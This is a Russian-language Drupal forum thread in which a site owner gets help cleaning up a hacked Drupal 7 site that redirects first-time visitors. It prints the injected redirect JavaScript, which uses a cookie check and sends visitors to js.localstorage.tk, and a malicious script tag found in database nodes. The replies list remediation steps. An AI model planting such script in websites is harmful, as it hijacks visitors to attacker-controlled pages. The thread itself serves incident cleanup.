Ломанули сайт! Спасите, помогите!

Главные вкладки

Аватар пользователя jobsdata jobsdata 19 апреля 2018 в 21:35

Добрый день.
Ломанули сайт на D7.
Полностью был не аллё.
Нашел вроде все сторонние файлы, удалил.
Вроде заработал.
Но например при первом заходе на сайт через Google Chrome, редиректит на какую то чебурду. При 2 заходе - все ок.
Так же при заходе через Оперу, через телефон Сафари, Яндекс браузер. т.е. при 1 заходе - редирект, второй заход норм.
В какой файл еще можно поглядеть где этот редирект?

Лучший ответ

Аватар пользователя StealsMan StealsMan 20 апреля 2018 в 12:17
2

Я делал так:
1. Удалил полностью drupal с хостинга.
2. Восстановил из бекапа тему сайта.
3. Слил БД, почистил "автозаменой" все левые добавленные скрипты (по всей базе).
Для примера:
<script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>
Залил БД обратно.
4. Скачал новый дистр Drupal с сайта. Закачал на хостинг.
5. Удалил левых пользователей и их привилегии.
6. Заменил пароль к FTP и MySql.
7. Проверил сайт различными сервисами (online-сканирование на наличие зловредов).

ЗЫ. Ломанули эти:
Ломанули

Если что - могу помочь. Обращайся в личку. Удачи!

Комментарии

Аватар пользователя Semantics Semantics 19 апреля 2018 в 22:06

Обновлять ядро.
Аудитить изменения в базе и коде.
Пересмотреть юзеров.
Панацеи нет, надо было обновляться вовремя

Аватар пользователя jobsdata jobsdata 19 апреля 2018 в 23:32

Что это за херомантия?

tryToAppend();

function tryToAppend(){
       
                        if (document.cookie.indexOf("qwerty33=") >= 0) {
                       
                        } else {
                                st();
                                var ul = "https://js.localstorage.tk/r.php";
                                document.location.href = ul;
                                window.location.href = ul;
                        }
       
            if(!document.body){
                return setTimeout(tryToAppend(),1);
            }
           counter();
}

function st(){ var now = new Date();now.setTime(now.getTime() + 1 * 3600 * 1000 * 12);document.cookie = "qwerty33=1; expires=" + now.toUTCString() + "; path=/";}

Вроде указывает на файл s.js ....найти ни как не могу

Аватар пользователя jobsdata jobsdata 20 апреля 2018 в 10:32

Вчера все обновил. А сегодня снова вирусные файлы (index.php) были залиты по разным папкам....
Я не пойму, чтобы закинуть файлы на ftp нужен доступ, все пароли сменил.
Или где то лежит файл который в первый раз был залит на хостинг и теперь создает остальные...
Люди есть идеи?

Аватар пользователя StealsMan StealsMan 20 апреля 2018 в 12:17
2

Я делал так:
1. Удалил полностью drupal с хостинга.
2. Восстановил из бекапа тему сайта.
3. Слил БД, почистил "автозаменой" все левые добавленные скрипты (по всей базе).
Для примера:
<script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>
Залил БД обратно.
4. Скачал новый дистр Drupal с сайта. Закачал на хостинг.
5. Удалил левых пользователей и их привилегии.
6. Заменил пароль к FTP и MySql.
7. Проверил сайт различными сервисами (online-сканирование на наличие зловредов).

ЗЫ. Ломанули эти:
Ломанули

Если что - могу помочь. Обращайся в личку. Удачи!

Аватар пользователя jobsdata jobsdata 20 апреля 2018 в 22:21

Спасибо. Вроде победил. Долго искал <script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>
а он ссюка в нодах сидел Smile

Аватар пользователя StealsMan StealsMan 20 апреля 2018 в 12:26

Да, забыл сказать. На хостинге можно выполнить поиск по дате изменения файла. У меня некоторые файлы были 1970 г., а некоторые - 18.04.2018 (дата взлома). Эти файлы пристально просмотреть, либо заменить их из бекапа Smile